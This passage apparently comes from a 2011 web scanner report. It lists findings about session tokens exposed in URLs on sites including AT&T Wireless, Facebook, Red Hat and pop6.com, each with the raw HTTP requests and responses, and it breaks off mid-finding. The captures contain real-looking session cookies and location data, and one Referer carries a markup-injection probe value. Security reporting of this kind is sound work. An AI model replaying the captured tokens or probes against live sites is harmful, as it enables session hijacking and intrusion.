Server: Apache/2.2.3 (CentOS) mod_perl/2.0.4 Perl/v5.8.8
Pragma: no-cache
Cache-control: no-cache
Content-Type: image/gif
Expires: Mon, 15 Aug 2011 19:05:34 GMT
Content-Length: 42

GIF89a.............!.......,........@..2.;

5.4. http://l.sharethis.com/pview

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://l.sharethis.com
Path:   /pview

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /pview?event=pview&source=share4x&publisher=b8241a5c-6fa7-404a-9989-13f94cdfff16&hostname=money.cnn.com&location=%2F2011%2F08%2F15%2Ftechnology%2Fgoogle_motorola%2Findex.htm&url=http%3A%2F%2Fmoney.cnn.com%2F2011%2F08%2F15%2Ftechnology%2Fgoogle_motorola%2Findex.htm%3Fhpt%3Dhp_t2&sessionID=1313434008984.63802&fpc=7549672-131cec47d99-1e28128-1&ts1313434014019.0 HTTP/1.1
Host: l.sharethis.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CqCKBE4fCaYVTTzg6idhAg==

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Mon, 15 Aug 2011 18:45:58 GMT
Connection: keep-alive


5.5. http://pop6.com/p/memsearch.cgi

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://pop6.com
Path:   /p/memsearch.cgi

Issue detail

The response contains the following links that appear to contain session tokens:

Request

POST /p/memsearch.cgi HTTP/1.1
Host: pop6.com
Proxy-Connection: keep-alive
Referer: http://pop6.com/
Content-Length: 281
Cache-Control: max-age=0
Origin: http://pop6.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ff_who=r,5w65lMjrqLrwOMX4tBJDb3u9zVyXXDfb8iqcLCgxMtTLydmHHDS2BQhVEFNyJfQm4GGOFc5Xe_Ay7fmuhWNXhiJ_qPyy_w/CzZc1DYiFS5o5eIrIEI51W9T/zDmtNu/o; v_hash=_english_0; IP_COUNTRY=United States; ff_tr=r,E7RSUL0YFx2gJ7Q5eed7yd8wG821Dq4Jd7gqlIWv6YPoJFKcFXi8XGVOPB7IKuq0; LOCATION_FROM_IP=ip_type&Mapped&connection&tx&country_code&US&lat&37.33053&asn&36351&state&California&ip_routing_type&fixed&carrier&softlayer+technologies+inc.&city&San+Jose&postal_code&95122&country_code_cf&99&state_cf&95&latitude&37.33053&second_level_domain&softlayer&country&United+States&longitude&-121.83823&country_name&United+States&area_code&408&timezone&-8.0&line_speed&high&aol&0&top_level_domain&com&region&southwest&city_cf&80&pmsa&7400&zip&95122&msa&41940&continent&north+america&lon&-121.83823&dma_code&807; HISTORY=20110815-1-Dc; REFERRAL_URL=; click_id_time=1867065876_2011-08-15 11:57:42; ki_u=e0c8bfdc-f008-5f82-d3b9-1cc1d298f090; ki_t=1313434723803%3B1313434723803%3B1313434723803%3B1%3B1

who=r%2C5w65lMjrqLrwOMX4tBJDb3u9zVyXXDfb8iqcLCgxMtTLydmHHDS2BQhVEFNyJfQm4GGOFc5Xe_Ay7fmuhWNXhiJ_qPyy_w%2FCzZc1DYiFS5o5eIrIEI51W9T%2FzDmtNu%2Fo&site=ff&searchtype=photo_search&looking_for_person=1&find
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:05:35 GMT
Server: Apache/2.2.3 (CentOS) mod_apreq2-20051231/2.6.1 mod_perl/2.0.4 Perl/v5.8.8
Set-Cookie: ff_who=r,9tCSyhGmD_RyWOBWStVf6Xu9zVyXXDfb8iqcLCgxMtTLydmHHDS2BQhVEFNyJfQm4GGOFc5Xe_Ay7fmuhWNXhiJ_qPyy_w/CzZc1DYiFS5o5eIrIEI51W9T/zDmtNu/o; path=/; domain=.pop6.com
Set-Cookie: v_hash=_english_0; path=/; domain=.pop6.com; expires=Wed, 14-Sep-2011 19:05:35 GMT
Set-Cookie: IP_COUNTRY=United States; path=/; domain=.pop6.com; expires=Wed, 14-Sep-2011 19:05:35 GMT
Set-Cookie: ff_tr=r,E7RSUL0YFx2gJ7Q5eed7yd8wG821Dq4Jd7gqlIWv6YPoJFKcFXi8XGVOPB7IKuq0; path=/; domain=.pop6.com; expires=Wed, 14-Sep-2011 19:05:35 GMT
Set-Cookie: LOCATION_FROM_IP=connection&tx&ip_type&Mapped&lat&37.33053&country_code&US&asn&36351&state&California&carrier&softlayer+technologies+inc.&ip_routing_type&fixed&city&San+Jose&state_cf&95&country_code_cf&99&postal_code&95122&latitude&37.33053&second_level_domain&softlayer&country&United+States&area_code&408&country_name&United+States&longitude&-121.83823&line_speed&high&timezone&-8.0&aol&0&region&southwest&top_level_domain&com&city_cf&80&pmsa&7400&msa&41940&zip&95122&continent&north+america&lon&-121.83823&dma_code&807; path=/; domain=.pop6.com; expires=Wed, 14-Sep-2011 19:05:35 GMT
Set-Cookie: HISTORY=20110815-3-Dcs1; path=/; domain=.pop6.com; expires=Wed, 14-Sep-2011 19:05:35 GMT
ETag: TESTBED
P3P: CP="DSP LAW"
X-ApacheServer: ii70-15.friendfinderinc.com
Vary: Accept-Encoding
Content-Length: 75888
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="canonical" href
...[SNIP]...
<noscript><img src="https://glean.pop6.com/images/common/glean.gif?rand=7705&site=ff&session=%5E5L%5C%40NF%5E%5EjH6+1313434662+50.23.123.106+&pwsid=&pagename=ttp%3A%2F%2Fpop6.com%2F&pagestate=&country=United+States&city=&lang=english&level=&gpid=g466070&pid=p9815" width=1 height=1 border=0></noscript>
...[SNIP]...

5.6. http://sales.liveperson.net/hc/76226072/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /hc/76226072/

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /hc/76226072/?visitor=&msessionkey=&site=76226072&cmd=startPage&page=http%3A//www.wireless.att.com/cell-phone-service/packages/windows-packages.jsp&visitorStatus=INSITE_STATUS&activePlugin=none&pageWindowName=1313432467768&javaSupport=true&id=1570370816&scriptVersion=1.1&d=1313432500472&&PAGEVAR!unit=wireless&SESSIONVAR!language=english&PAGEVAR!UAScontext=Windows%20Packages%20-%20Wireless%20from%20AT%26T&PAGEVAR!Section=Store&SESSIONVAR!visitorType=NEW&PAGEVAR!OrderDetails=&PAGEVAR!OrderDetails2=&VISITORVAR!VisitorID=1fKdTJjTTvqPt1%211142544054%211313432403008&cobrowse=true&scriptType=SERVERBASED&cookie=TLTUID%3D7284D2A8C16210C1695BC3E02554C7F2%3B%20ECOM_GTM%3DNA_osbth%3B%20cust_type%3Dnew%3B%20browserid%3DA001693504923%3B%20svariants%3DNA%3B%20DL3K%3D3_fK9L_XmvTCv3Jaj9415jcvofrDw_j4lng7oxa5Rw6yNCKjvqChmkg%3B%2000d78e1f-01f0-45cd-9f9c-79e690335b05%3D%257B%2522parent_id%2522%253A%2522kwkf9w9SRba%2522%252C%2522referrer%2522%253A%2522http%253A%252F%252Fwww.fakereferrerdominator.com%252FreferrerPathName%253FRefParName%253DRefValue%2522%252C%2522id%2522%253A%2522uo_OgfisI0f%2522%252C%2522wom%2522%253Atrue%252C%2522entry_point%2522%253A%2522http%253A%252F%252Fwww.wireless.att.com%252Fcell-phone-service%252Fcell-phones%252Fcell-phones.jsp%253Ffeacondition%253Dallphones%2526feaavailable%253Dallphones%2526feapaytype%253Dstandard%2526startFilter%253Dfalse%2526allTypes%253Don%2526osWindows%252520Phone%253D100012%2526allManus%253Don%2526source%253DECWD000000000000O%2523fbid%25253Dkwkf9w9SRba%2526migAtlSA%253D341465538%2526migAtlC%253D480d7815-42e6-4315-a737-64cdf14f8adc%2522%252C%2522url_tag%2522%253A%2522NOMTAG%2522%257D%3B%20bn_u%3D6923670900791695274%3B%20__utma%3D52846072.1104250127.1312768993.1312768993.1312768993.1%3B%20__utmz%3D52846072.1312768993.1.1.utmcsr%3Dfakereferrerdominator.com%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D/referrerPathName%3B%20__utma%3D241758596.1378329856.1312769231.1312769231.1313431966.2&title=&referrer= HTTP/1.1
Host: sales.liveperson.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wireless.att.com/cell-phone-service/packages/windows-packages.jsp
Cookie: LivePersonID=-546022977410-1313431914:-1:-1:-1:-1; HumanClickKEY=7991325949139639887; HumanClickSiteContainerID_76226072=Master; LivePersonID=LP i=546022977410,d=1312768968; HumanClickACTIVE=1313432439530

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:20:45 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_76226072=Master; path=/hc/76226072
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 34

GIF89a(............,...........L.;

5.7. http://wls.wireless.att.com/dcsw1sx8x45vbwmw7v63tbf8m_1h2f/dcs.gif

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://wls.wireless.att.com
Path:   /dcsw1sx8x45vbwmw7v63tbf8m_1h2f/dcs.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /dcsw1sx8x45vbwmw7v63tbf8m_1h2f/dcs.gif?&dcsdat=1313432466426&dcssip=www.wireless.att.com&dcsuri=/cell-phone-service/packages/free-packages.jsp&dcsqry=%3Fsource%3DECWD000000000000O&dcsref=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&WT.mc_id=ECWD000000000000O&WT.tz=-5&WT.bh=13&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Free%20Phone%20Deals%20and%20Packages%20-%20Shop%20-%20Wireless%20from%20AT%26T&WT.js=Yes&WT.bs=1163x508&WT.fi=No&WT.vt_sid=123&browserid=A001693504923&sessionid=null&buyflowtype=NEW&wt_aka_georegion=246&wt_aka_country_code=US&wt_aka_region_code=CA&wt_aka_city=SANJOSE&wt_aka_dma=807&wt_aka_pmsa=7400&wt_aka_msa=7362&wt_aka_areacode=408&wt_aka_county=SANTACLARA&wt_aka_fips=06085&wt_aka_lat=37.3353&wt_aka_long=-121.8938&wt_aka_timezone=PST&wt_aka_zip=95101&wt_aka_continent=NA&wt_aka_throughput=vhigh&wt_aka_bw=5000&wt_aka_asnum=36351&wt_aka_location_id=0&wt_DMA_Name=San%20Francisco-San%20Jose%20Area&wtDealerCode=Z0066&wtFSRcodePresent=6.3.0_015A HTTP/1.1
Host: wls.wireless.att.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wireless.att.com/cell-phone-service/packages/free-packages.jsp?source=ECWD000000000000O
Cookie: TLTUID=7284D2A8C16210C1695BC3E02554C7F2; ECOM_GTM=NA_osbth; cust_type=new; browserid=A001693504923; svariants=NA; bn_u=6923670900791695274; ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtMzU5MjYyNDcyMC4zMDE2ODQzMAAAAAAAAAABAAAAAgAAAKpgSU6jYElOAQAAAAEAAACqYElOo2BJTgEAAAACAAAAITUwLjIzLjEyMy4xMDYtMzU5MjYyNDcyMC4zMDE2ODQzMA--; __utma=52846072.1104250127.1312768993.1312768993.1312768993.1; __utmz=52846072.1312768993.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utma=241758596.1378329856.1312769231.1312769231.1313431966.2; __utmz=241758596.1313431966.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmb=241758596.1.10.1313431966; TLTHID=334FB54EC76B10C7B47BF82B0BF36CDD; TLTSID=31A640C8C76B10C7A09DCAEB2DFC8A0E; fsr.a=1313432465833; wtAka=y

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Last-Modified: Wed, 07 Mar 2007 19:00:42 GMT
Accept-Ranges: bytes
ETag: "02926e7ea60c71:c87"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtMzU5MjYyNDcyMC4zMDE2ODQzMAAAAAAAAAABAAAAAgAAAJ5iSU6jYElOAQAAAAEAAACeYklOo2BJTgEAAAACAAAAITUwLjIzLjEyMy4xMDYtMzU5MjYyNDcyMC4zMDE2ODQzMA--; path=/; expires=Thu, 12-Aug-2021 18:17:02 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Date: Mon, 15 Aug 2011 18:17:01 GMT
Connection: close

GIF89a.............!.......,...........D..;

5.8. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=108503912579284&app_id=108503912579284&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df172165908%26origin%3Dhttp%253A%252F%252Fviral.lionsgate.com%252Ff1f34393a8%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=0&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1416d0dc%26origin%3Dhttp%253A%252F%252Fviral.lionsgate.com%252Ff1f34393a8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfd507147%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2b846cdbc%26origin%3Dhttp%253A%252F%252Fviral.lionsgate.com%252Ff1f34393a8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfd507147&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df4c0ff41%26origin%3Dhttp%253A%252F%252Fviral.lionsgate.com%252Ff1f34393a8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfd507147&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df379b0b22c%26origin%3Dhttp%253A%252F%252Fviral.lionsgate.com%252Ff1f34393a8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfd507147&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://viral.lionsgate.com/conanthebarbarian/facebook/game/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; lsd=yxUAz; datr=pG8pTrLcOF5vWXJLyEMRGq7p; reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FConanTheBarbarian%3Fsk%3Dapp_108503912579284; wd=1123x954

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.22.57
X-Cnection: close
Date: Mon, 15 Aug 2011 18:25:38 GMT
Content-Length: 247

<script type="text/javascript">
parent.postMessage("cb=f4c0ff41&origin=http\u00253A\u00252F\u00252Fviral.lionsgate.com\u00252Ff1f34393a8&relation=parent&transport=postmessage&frame=fd507147", "http:\/
...[SNIP]...

5.9. http://www.google.com/recaptcha/api/challenge

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.google.com
Path:   /recaptcha/api/challenge

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /recaptcha/api/challenge?k=6LfDxsYSAAAAAGGLBGaRurawNnbvAGQw5UwRWYXL&ajax=1&xcachestop=0.5170781947672367&authp=nonce.tt.time.new_audio_default&psig=6SS-NWc821W-RgFd6E4FWf4Kok8&nonce=KrCCF9r-90AbIC04R7PaDQ&tt=LGGjVHt-4R8eLqAd5PTXoCpFeIM&time=1313433562&new_audio_default=1 HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://pt-br.facebook.com/people/Andr%C3%A9-Azevedo/1668500662
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=69580f9920d5f494:U=02e48c2870b7e459:FF=0:TM=1310132119:LM=1310132498:S=QbWdR-loyTGm4ljm; NID=49=SeqENWDJp1RhQynOGuaP5MaEDdFIEWzZKNfyzN11QVNUFV6g57NKp2RhvR_8p-q-LzBn5EkmLpuOPnz6NlRmKJ-efD6HvcO3-ab2X1zJIi23BmyRIfNPcRAplfZ_7qJ7

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Date: Mon, 15 Aug 2011 18:39:25 GMT
Content-Type: text/javascript
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 492
Server: GSE


var RecaptchaState = {
site : '6LfDxsYSAAAAAGGLBGaRurawNnbvAGQw5UwRWYXL',
challenge : '03AHJ_Vuu8_Bw-2q6DqOZHVhZfYn4zvD3oLhAtPknYtvE6Go7aJXLrLOc_8fX8AZSPjUEMgJm6I5bZ2Dk5MS9DeRHFM-Pcp4n-HuM-Fz
...[SNIP]...

5.10. https://www.redhat.com/wapps/ugc/register.html

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.redhat.com
Path:   /wapps/ugc/register.html

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /wapps/ugc/register.html;jsessionid=i3aaZtOnOMF4S30iWROsiQ**.4b748952?_flowExecutionKey=_cF7B3B892-4CEE-2290-D8A6-E69E0CDC508B_kC88A76EF-152B-F83F-175E-9854DABB8DB9 HTTP/1.1
Host: www.redhat.com
Connection: keep-alive
Referer: https://www.redhat.com/wapps/sso/login.html?redirect=%2Fwapps%2Fstore%2Fprotected%2Fpurchase.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=i3aaZtOnOMF4S30iWROsiQ**.4b748952; rh_omni_tc=70160000000H4AjAAK; s_ria=flash%2010%7Csilverlight%204.0; s_vnum=1316027200761%26vn%3D1; s_vi=[CS]v1|2724B704851D0F89-60000130E007A637[CE]; www-session-id=8ccce98baea8ecd121b0a86afe4a630d; rh_store=ver%3D1.4%3Bline%3DRH0844913%3A1%3Astrue%3Ad1313435219589%3Ad1344971219589%3A-1%3Acnull%3Afalse%3Anull; s_cc=true; s_nr=1313435299756; s_invisit=true; s_sq=redhatglobal%2Credhatcom%3D%2526pid%253Dhttps%25253A//www.redhat.com/wapps/sso/login.html%25253Fredirect%25253D%2525252Fwapps%2525252Fstore%2525252Fprotected%2525252Fpurchase.html%2526oid%253Dhttps%25253A//www.redhat.com/wapps/ugc/register.html%25253Fredirect%25253D/wapps/store/protected/purchase.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 27384
Expires: Mon, 15 Aug 2011 19:07:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 19:07:26 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>redhat.
...[SNIP]...

5.11. http://www.wireless.att.com/cell-phone-service/packages/free-packages.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.wireless.att.com
Path:   /cell-phone-service/packages/free-packages.jsp

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /cell-phone-service/packages/free-packages.jsp?source=ECWD000000000000O HTTP/1.1
Host: www.wireless.att.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: TLTUID=7284D2A8C16210C1695BC3E02554C7F2; ECOM_GTM=NA_osbth; cust_type=new; browserid=A001693504923; svariants=NA; DL3K=3_fK9L_XmvTCv3Jaj9415jcvofrDw_j4lng7oxa5Rw6yNCKjvqChmkg; 00d78e1f-01f0-45cd-9f9c-79e690335b05=%7B%22parent_id%22%3A%22kwkf9w9SRba%22%2C%22referrer%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22id%22%3A%22uo_OgfisI0f%22%2C%22wom%22%3Atrue%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fcell-phones%2Fcell-phones.jsp%3Ffeacondition%3Dallphones%26feaavailable%3Dallphones%26feapaytype%3Dstandard%26startFilter%3Dfalse%26allTypes%3Don%26osWindows%2520Phone%3D100012%26allManus%3Don%26source%3DECWD000000000000O%23fbid%253Dkwkf9w9SRba%26migAtlSA%3D341465538%26migAtlC%3D480d7815-42e6-4315-a737-64cdf14f8adc%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; bn_u=6923670900791695274; __utma=52846072.1104250127.1312768993.1312768993.1312768993.1; __utmz=52846072.1312768993.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utma=241758596.1378329856.1312769231.1312769231.1313431966.2; __utmz=241758596.1313431966.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmb=241758596.1.10.1313431966

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 135031
Expires: Mon, 15 Aug 2011 18:20:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:20:04 GMT
Connection: close
Set-Cookie: TLTHID=31FEFBDCC76B10C7BCD0FCE33BDE3340; Path=/; Domain=.att.com


                                                                                                                           
...[SNIP]...
<p>-->
<a href='https://sales.liveperson.net/hc/76226072/?cmd=file&amp;file=visitorWantsToChat&amp;site=76226072&amp;byhref=1&amp;AEPARAMS&amp;SESSIONVAR!StaticButtonNameNoScript=cingular' target='chat76226072'>
   <img id='hcDynamicIcon' name='hcDynamicIcon' src='/cell-phone-service/livePerson/chat_deployment_global/cingular/images/noscript_button/reponline.gif' alt='Live Chat' border='0' />
...[SNIP]...

5.12. http://www.wireless.att.com/cell-phone-service/packages/netbook-packages.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.wireless.att.com
Path:   /cell-phone-service/packages/netbook-packages.jsp

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /cell-phone-service/packages/netbook-packages.jsp HTTP/1.1
Host: www.wireless.att.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wireless.att.com/cell-phone-service/packages/free-packages.jsp?source=ECWD000000000000O90d55%3E%3Ca%20b%3dc%3E17435fcd4f5
Cookie: TLTUID=7284D2A8C16210C1695BC3E02554C7F2; ECOM_GTM=NA_osbth; cust_type=new; browserid=A001693504923; svariants=NA; DL3K=3_fK9L_XmvTCv3Jaj9415jcvofrDw_j4lng7oxa5Rw6yNCKjvqChmkg; 00d78e1f-01f0-45cd-9f9c-79e690335b05=%7B%22parent_id%22%3A%22kwkf9w9SRba%22%2C%22referrer%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22id%22%3A%22uo_OgfisI0f%22%2C%22wom%22%3Atrue%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fcell-phones%2Fcell-phones.jsp%3Ffeacondition%3Dallphones%26feaavailable%3Dallphones%26feapaytype%3Dstandard%26startFilter%3Dfalse%26allTypes%3Don%26osWindows%2520Phone%3D100012%26allManus%3Don%26source%3DECWD000000000000O%23fbid%253Dkwkf9w9SRba%26migAtlSA%3D341465538%26migAtlC%3D480d7815-42e6-4315-a737-64cdf14f8adc%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; bn_u=6923670900791695274; __utma=52846072.1104250127.1312768993.1312768993.1312768993.1; __utmz=52846072.1312768993.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utma=241758596.1378329856.1312769231.1312769231.1313431966.2; __utmz=241758596.1313431966.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmb=241758596.4.10.1313431966; TLTHID=9C4648E2C76B10C7B846FFAD8CC90BB7; TLTSID=9C4648E2C76B10C7B846FFAD8CC90BB7; BIGipServerpWL_7010_7011=2060571015.25115.0000; fsr.a=1313432642829; wtAka=y

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 91395
Expires: Mon, 15 Aug 2011 18:23:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:23:08 GMT
Connection: close
Set-Cookie: TLTHID=A01F50D0C76B10C7BEB5A17F0D25FB73; Path=/; Domain=.att.com


                                                                           
...[SNIP]...
<p>-->
<a href='https://sales.liveperson.net/hc/76226072/?cmd=file&amp;file=visitorWantsToChat&amp;site=76226072&amp;byhref=1&amp;AEPARAMS&amp;SESSIONVAR!StaticButtonNameNoScript=cingular' target='chat76226072'>
   <img id='hcDynamicIcon' name='hcDynamicIcon' src='/cell-phone-service/livePerson/chat_deployment_global/cingular/images/noscript_button/reponline.gif' alt='Live Chat' border='0' />
...[SNIP]...

5.13. http://www.wireless.att.com/cell-phone-service/packages/windows-packages.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.wireless.att.com
Path:   /cell-phone-service/packages/windows-packages.jsp

Issue detail

